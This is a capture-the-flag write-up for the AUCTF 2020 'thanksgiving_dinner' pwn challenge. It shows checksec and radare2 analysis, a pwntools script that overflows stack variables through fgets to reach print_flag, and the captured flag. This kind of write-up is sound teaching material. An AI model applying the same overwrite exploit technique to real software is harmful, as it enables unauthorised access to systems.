Intro
This is the second pwn challenge of AUCTF 2020. It was solved 238 times and it was worth 408 points.
Description:
I just ate a huge dinner. I can barley eat anymore… so please don’t give me too much!
nc challenges.auctf.com 30011
Note: ASLR is disabled for this challenge
You could download the binary here
$ sha256sum ./thanksgiving_dinner
2307af59beead6a2377c3beb2ff26f70d5732ec6b651b5c31e58b8f692bfb70c thanksgiving_dinner
Exploitation
The program simply ask for an input. But it seems not vulnerable to a buffer overflow:
$ ./thanksgiving_dinner
Hi!
Welcome to my program... it's a little buggy...
Hey I heard you are searching for flags! Well I've got one. :)
Here you can have part of it!
auctf{
Sorry that's all I got!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
So I checked the binary with checksec. Then I opened with radare2.
$ checksec ./thanksgiving_dinner
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
$ r2 -Ad ./thanksgiving_dinner
Then I found two promising functions:
[r2]> afl
.....
0x56556250 7 198 sym.vulnerable
0x56556360 3 162 sym.print_flag
....
[r2]> axt sym.vulnerable
main 0x5655623c [CALL] call sym.vulnerable
[r2]> axt sym.print_flag
sym.vulnerable 0x5655630b [CALL] call sym.print_flag
The vulnerable
function is called by main
. The print_flag
function is called by vulnerable
.
So here is the interesting part about the latter.
It gets an input a string and if some values are correct print_flag
is called. Thanks the fgets
we can overwrite those variables easily:
[r2]> pdf @sym.vulnerable
.....
│ 0x565562d9 6a24 push 0x24 ; 36
│ 0x565562db 8d45d4 lea eax, [var_2ch]
│ 0x565562de 50 push eax
│ 0x565562df e85cfdffff call sym.imp.fgets
│ 0x565562e4 83c410 add esp, 0x10
│ 0x565562e7 817df4371300. cmp dword [var_ch], 0x1337
│ ┌─< 0x565562ee 7520 jne 0x56556310
│ │ 0x565562f0 837df0ec cmp dword [var_10h], 0xffffffec
│ ┌──< 0x565562f4 7d1a jge 0x56556310
│ ││ 0x565562f6 837de814 cmp dword [var_18h], 0x14
│ ┌───< 0x565562fa 7414 je 0x56556310
│ │││ 0x565562fc 817dec637466. cmp dword [var_14h], 0x667463
│ ┌────< 0x56556303 750b jne 0x56556310
│ ││││ 0x56556305 837de42a cmp dword [var_1ch], 0x2a
│ ┌─────< 0x56556309 7505 jne 0x56556310
│ │││││ 0x5655630b e850000000 call sym.print_flag
│ └└└└└─> 0x56556310 90 nop
│ 0x56556311 8b5dfc mov ebx, dword [var_4h]
│ 0x56556314 c9 leave
└ 0x56556315 c3 ret
So this is my exploit:
#!/usr/bin/python2
from pwn import *
prog = context.binary = ELF(os.getcwd() + "/turkey", checksec=False)
if len(sys.argv) > 1:
host = "challenges.auctf.com"
port = 30011
t = remote(host, port)
else:
t = prog.process()
offset = 16
payload = "A"*offset
payload += pack(0x2a) # var_1ch
payload += pack(0x15) # var_18h
payload += pack(0x667463) # var_14h
payload += pack(0xffffffeb) # var_10h
payload += pack(0x1337) # var_ch
t.sendline(payload)
t.interactive()
t.close()
And this is the flag:
$ cat flag.txt
auctf{I_s@id_1_w@s_fu11!}